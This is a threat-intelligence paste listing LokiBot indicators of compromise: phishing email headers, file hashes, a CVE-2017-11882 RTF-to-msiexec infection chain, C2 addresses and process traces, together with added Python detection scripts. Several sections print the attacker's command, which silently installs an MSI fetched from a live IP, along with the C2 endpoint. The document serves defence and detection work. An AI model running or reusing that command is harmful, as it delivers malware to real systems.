#lokibot_151118

VRad Nov 15th, 2018 (edited)
#IOC #OptiData #VR #LokiBot #11882 #MSI

https://pastebin.com/cqZg7kwr

previous_contacts:
--------------
16/10/18    - https://pastebin.com/LPqjHUkQ
08/10/18    - https://pastebin.com/cZxQGbyq
01/10/18    - https://pastebin.com/AVWK3XsB

FAQ:
https://radetskiy.wordpress.com/2018/10/19/ioc_lokibot_161018/

attack_vector
--------------
email attach doc (RTF) > CVE-2017-11882 (EQNEDT32.EXE) > cmd.exe > msiexec.exe /i http://34.244.180.39/oo.msi /quiet

email_headers
--------------
Received: from elayouty.com (unknown [84.16.232.203]) by mail1.victim.com with smtp
Received: from [::1] (port=48392 helo=server.sauditunnels.com)
    by server.sauditunnels.com with esmtpa (Exim 4.91)
    (envelope-from <meenakshi@uhlpharma.co.in>)
Date: Thu, 15 Nov 2018 06:34:16 +0300
From: PURCHASE <mshahbour@elayouty.com>
To: undisclosed-recipients:;
Subject: PURCHASE ORDER 25437
X-Sender: meenakshi@uhlpharma.co.in
User-Agent: Roundcube Webmail/1.3.6

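The headers above carry the usual signs of a phish sent through someone else's webmail account: the visible From: (elayouty.com) does not match the SMTP envelope-from or the Roundcube X-Sender (uhlpharma.co.in), the recipients are undisclosed, and the receiving MTA could not reverse-resolve the last hop ("unknown [84.16.232.203]"). The script below is an added example (not part of the paste) that pulls those fields out with the standard library and flags each inconsistency. The first sample is the header block quoted above; the second is a constructed, consistent control message (example.net is a hypothetical domain).

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample: the headers quoted in the paste above, verbatim.
PHISH_HEADERS = """\
Received: from elayouty.com (unknown [84.16.232.203]) by mail1.victim.com with smtp
Received: from [::1] (port=48392 helo=server.sauditunnels.com)
    by server.sauditunnels.com with esmtpa (Exim 4.91)
    (envelope-from <meenakshi@uhlpharma.co.in>)
Date: Thu, 15 Nov 2018 06:34:16 +0300
From: PURCHASE <mshahbour@elayouty.com>
To: undisclosed-recipients:;
Subject: PURCHASE ORDER 25437
X-Sender: meenakshi@uhlpharma.co.in
User-Agent: Roundcube Webmail/1.3.6

"""

# Constructed control sample (hypothetical, consistent sender) for the clean case.
CLEAN_HEADERS = """\
Received: from mail.example.net (mail.example.net [192.0.2.10]) by mail1.victim.com with esmtps
Received: from client.example.net (port=51000 helo=client.example.net)
    by mail.example.net with esmtpa (Exim 4.91)
    (envelope-from <alice@example.net>)
From: Alice <alice@example.net>
To: bob@victim.com
Subject: hello
X-Sender: alice@example.net

"""

ENVELOPE_FROM_RE = re.compile(r"envelope-from\s+<([^>]+)>", re.I)
# "from <helo-name> (unknown [ip])": the receiving MTA could not reverse-resolve the peer.
NO_RDNS_RE = re.compile(r"^from\s+\S+\s+\(unknown\s+\[[^\]]+\]\)", re.I)


def _domain(addr):
    return addr.rpartition("@")[2].lower()


def header_findings(raw):
    """Compare the visible From: with the SMTP envelope sender and the webmail
    X-Sender:, and inspect the last hop. Returns the extracted values plus a
    sorted list of flag names (empty when everything is consistent)."""
    msg = message_from_string(raw)
    # Received: headers are folded; collapse whitespace so regexes see one line per hop.
    received = [re.sub(r"\s+", " ", r).strip() for r in msg.get_all("Received", [])]
    from_addr = parseaddr(msg.get("From", ""))[1].lower()
    x_sender = parseaddr(msg.get("X-Sender", ""))[1].lower()
    envelope_from = ""
    for hop in received:
        m = ENVELOPE_FROM_RE.search(hop)
        if m:
            envelope_from = m.group(1).lower()
            break
    flags = []
    if envelope_from and _domain(envelope_from) != _domain(from_addr):
        flags.append("envelope_from_domain_mismatch")
    if x_sender and x_sender != from_addr:
        flags.append("x_sender_mismatch")
    if "undisclosed-recipients" in msg.get("To", "").lower():
        flags.append("undisclosed_recipients")
    # received[0] is the hop closest to us, i.e. the one our own MTA wrote.
    if received and NO_RDNS_RE.match(received[0]):
        flags.append("no_reverse_dns_on_last_hop")
    return {"from": from_addr, "envelope_from": envelope_from,
            "x_sender": x_sender, "flags": sorted(flags)}


if __name__ == "__main__":
    for name, raw in (("phish", PHISH_HEADERS), ("clean", CLEAN_HEADERS)):
        print(name, header_findings(raw))
```

None of these flags is proof on its own (mailing-list relays and some marketing platforms trip the envelope check legitimately), but three or four together on a "purchase order" with an RTF attachment are worth a quarantine rule.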
files
--------------
SHA-256 1a711629a0cc2ec3e9c14d9500ff7cab1114474c98eb0d9392e269f50aea8513
File name   DOC_ORDER25437.doc (!) RTF
File size   265.34 KB

SHA-256 917ef82d209a7293244706bbd625c3d055d152d6eb37c30e99b214d1a085e051
File name   oo.msi
File size   1.25 MB


Denis O'Brien @Malwageddon:
"If metadata doesn't lie, the RTF file was created back in Sep."

activity
**************

cmd.exe & /C CD C: & msiexec.exe /i http://34.244.180{.} 39/oo.msi /quiet

PL_GET:     34.244.180.39/oo.msi

C2:     188.225.27.43
        h11p://sahakyanshn{.} com/baba1010/five/fre.php

netwrk
--------------
GET /oo.msi HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Windows Installer
Host: 34.244.180.39

188.225.27.43   sahakyanshn{.} com  POST /baba1010/five/fre.php HTTP/1.0    Mozilla/4.08 (Charon; Inferno)

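Two things in the netwrk section are cheap to alert on at a proxy or in HTTP logs: a Windows Installer User-Agent fetching an .msi straight from an IP literal (the payload pull), and the hard-coded LokiBot User-Agent "Mozilla/4.08 (Charon; Inferno)" on a POST over HTTP/1.0 to a .php path (the C2 beacon to fre.php). The following is an added example, not part of the paste, that parses raw request heads and tags them on those three properties. The first two samples are constructed from the two requests shown above (any header not shown there, such as Content-Length on the POST, is assumed); the third is a hypothetical benign installer download from a named host, included as a control.

```python
import ipaddress

LOKIBOT_UA = "Mozilla/4.08 (Charon; Inferno)"

# Constructed samples: (destination IP, raw request head). The first two mirror the
# requests in the netwrk section above; headers not shown there are assumed. The
# third is a hypothetical benign Windows Installer download from a named host.
SAMPLE_REQUESTS = [
    ("34.244.180.39",
     "GET /oo.msi HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\n"
     "User-Agent: Windows Installer\r\nHost: 34.244.180.39\r\n\r\n"),
    ("188.225.27.43",
     "POST /baba1010/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
     "Host: sahakyanshn.com\r\nAccept: */*\r\nContent-Length: 0\r\n\r\n"),
    ("203.0.113.5",
     "GET /updates/agent.msi HTTP/1.1\r\nUser-Agent: Windows Installer\r\n"
     "Host: downloads.example.com\r\n\r\n"),
]


def parse_request(raw):
    """Split an HTTP request head into method, target, version and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def is_bare_ip(host):
    """True when the Host header is an IP literal (v4, or bracketed v6), with or without a port."""
    host = host.strip()
    if host.startswith("["):
        host = host[1:host.find("]")]
    elif host.count(":") == 1:
        host = host.split(":")[0]
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def classify_request(req):
    tags = []
    ua = req["headers"].get("user-agent", "")
    host = req["headers"].get("host", "")
    target = req["target"].lower()
    # Windows Installer pulling a package straight from an IP literal (the PL_GET above).
    if ua == "Windows Installer" and target.endswith(".msi") and is_bare_ip(host):
        tags.append("msi_fetch_from_bare_ip")
    # The hard-coded LokiBot User-Agent string.
    if ua.startswith(LOKIBOT_UA):
        tags.append("lokibot_user_agent")
    # Beacon shape independent of the UA: POST over HTTP/1.0 to a .php endpoint.
    if req["method"] == "POST" and req["version"] == "HTTP/1.0" and target.endswith(".php"):
        tags.append("post_http10_to_php")
    return tags


def scan(samples):
    """Return (destination, tags) for every request that raised at least one tag."""
    hits = []
    for dst, raw in samples:
        tags = classify_request(parse_request(raw))
        if tags:
            hits.append((dst, tags))
    return hits


if __name__ == "__main__":
    for dst, tags in scan(SAMPLE_REQUESTS):
        print(dst, tags)
```

The UA match is the high-confidence signal; the HTTP/1.0 POST-to-.php shape is kept separate so it still fires if a later build changes the string, at the cost of needing a whitelist for legacy internal apps.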
comp
--------------
msiexec.exe 440 TCP 34.244.180.39   80  SYN_SENT
MSIF29F.tmp 3348    TCP 188.225.27.43   80  ESTABLISHED
[System]    0   TCP 188.225.27.43   80  TIME_WAIT

proc
--------------
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
C:\Windows\SysWOW64\cmd.exe & /C CD C: & msiexec.exe /i http://34.244.180.39/oo.msi /quiet
C:\Windows\SysWOW64\msiexec.exe   /i http://34.244.180.39/oo.msi /quiet
C:\Windows\system32\msiexec.exe /V
"C:\Windows\Installer\MSIF29F.tmp"

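The process list above is the whole chain: Equation Editor (EQNEDT32.EXE, started via -Embedding by the RTF) spawns cmd.exe, which runs msiexec.exe /i against an http:// URL with /quiet, the MSI service (msiexec /V) then executes the package's custom-action binary from C:\Windows\Installer as MSIF29F.tmp. Each link is detectable from process-creation telemetry alone. The script below is an added example, not part of the paste, that tags Sysmon-style events on three rules: EQNEDT32.EXE as a parent of anything, msiexec /i pointed at an http(s) URL (with /quiet or /q noted), and an MSIxxxx.tmp executed under msiexec.exe. The first two events are constructed from the proc section; the parents recorded for msiexec /V and MSIF29F.tmp are assumed (services.exe starts the MSI server, which runs the custom action), and the last event is a hypothetical benign local install used as a control.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events (Sysmon-style fields). The first two mirror the
# proc section above. The parents for msiexec.exe /V and MSIF29F.tmp are assumed;
# the last event is a hypothetical benign local install used as a control.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r"C:\Windows\SysWOW64\cmd.exe & /C CD C: & msiexec.exe /i http://34.244.180.39/oo.msi /quiet"},
    {"ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "Image": r"C:\Windows\SysWOW64\msiexec.exe",
     "CommandLine": r"C:\Windows\SysWOW64\msiexec.exe /i http://34.244.180.39/oo.msi /quiet"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\system32\msiexec.exe",
     "CommandLine": r"C:\Windows\system32\msiexec.exe /V"},
    {"ParentImage": r"C:\Windows\system32\msiexec.exe",
     "Image": r"C:\Windows\Installer\MSIF29F.tmp",
     "CommandLine": r'"C:\Windows\Installer\MSIF29F.tmp"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'msiexec.exe /i "C:\Users\operator\Downloads\tool.msi" /qn'},
]

# msiexec /i (or -i) pointed at an http(s) URL: the package is fetched from the network.
REMOTE_MSI_RE = re.compile(r"(?:^|\s)[/-]i\s+[\"']?https?://", re.I)
QUIET_RE = re.compile(r"(?:^|\s)[/-](?:quiet|qn|q)\b", re.I)
# Windows Installer writes custom-action binaries as C:\Windows\Installer\MSIxxxx.tmp.
MSI_TMP_RE = re.compile(r"^msi[0-9a-f]{4}\.tmp$")


def basename(path):
    return PureWindowsPath(path).name.lower()


def tag_event(ev):
    tags = []
    parent, image, cmd = basename(ev["ParentImage"]), basename(ev["Image"]), ev["CommandLine"]
    if parent == "eqnedt32.exe":
        # Equation Editor has no legitimate reason to spawn child processes.
        tags.append("equation_editor_child")
    if "msiexec" in cmd.lower() and REMOTE_MSI_RE.search(cmd):
        # Fires on the cmd.exe line (which carries the msiexec command) and on msiexec itself.
        tags.append("remote_msi_install")
        if QUIET_RE.search(cmd):
            tags.append("silent_install")
    if MSI_TMP_RE.match(image) and parent == "msiexec.exe":
        tags.append("installer_tmp_exec")
    return tags


def analyze(events):
    """Return (event index, tags) for each event that raised at least one tag."""
    hits = []
    for i, ev in enumerate(events):
        tags = tag_event(ev)
        if tags:
            hits.append((i, tags))
    return hits


if __name__ == "__main__":
    for i, tags in analyze(SAMPLE_EVENTS):
        print(i, basename(SAMPLE_EVENTS[i]["Image"]), tags)
```

The EQNEDT32.EXE parent rule is the one to keep even if the other two are noisy in a software-deployment environment; installer_tmp_exec alone is common on any host where MSI packages with custom actions are installed.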
persist
--------------
n/a

drop
--------------
C:\Windows\Installer\MSIF29F.tmp
C:\Users\operator\AppData\Roaming\39B01F\FA74A3.exe
C:\Users\operator\AppData\Roaming\39B01F\FA74A3.hdb

# # #
doc (RTF)   https://www.virustotal.com/#/file/1a711629a0cc2ec3e9c14d9500ff7cab1114474c98eb0d9392e269f50aea8513/details
            https://iris-h.services/#/pages/report/3dd0fe53b7f1ade6765df8da45b8b7c2ae6ed41b
msi     https://www.virustotal.com/#/file/917ef82d209a7293244706bbd625c3d055d152d6eb37c30e99b214d1a085e051/details
        https://analyze.intezer.com/#/analyses/3d6796ac-e098-4b61-aad7-3cc552dd2304